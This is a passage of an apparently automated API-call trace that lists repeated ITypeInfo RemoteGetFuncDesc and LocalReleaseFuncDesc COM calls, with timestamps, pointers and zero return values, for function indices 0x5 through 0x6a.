pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x10, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x11, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x12, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.347] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.347] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x13, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x14, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x15, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x16, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x17, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x18, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x19, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1a, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1b, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1c, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1d, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1e, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1f, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x20, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x21, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x22, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x23, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x24, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x25, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x26, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x27, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.348] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x28, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.348] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x29, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2a, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2b, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2c, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2d, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2e, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2f, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x30, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x31, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x32, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x33, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x34, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x35, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x36, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x37, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x38, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x39, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3a, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3b, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3c, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.349] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3d, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.349] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3e, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3f, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x40, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x41, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x42, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x43, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x44, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x45, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x46, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x47, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x48, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x49, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4a, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4b, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4c, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4d, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4e, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4f, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.350] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x50, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.350] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x51, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x52, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x53, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x54, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x55, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x56, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x57, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x58, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x59, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5a, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5b, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5c, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5d, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5e, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5f, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x60, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x61, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x62, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x63, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x64, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.351] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.351] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x65, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x66, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x67, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x68, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x69, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.352] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6a, ppFuncDesc=0x186a18, pDummy=0x100 | out: ppFuncDesc=0x186a18, pDummy=0x100) returned 0x0 [0041.352] ITypeInfo:LocalReleaseFuncDesc 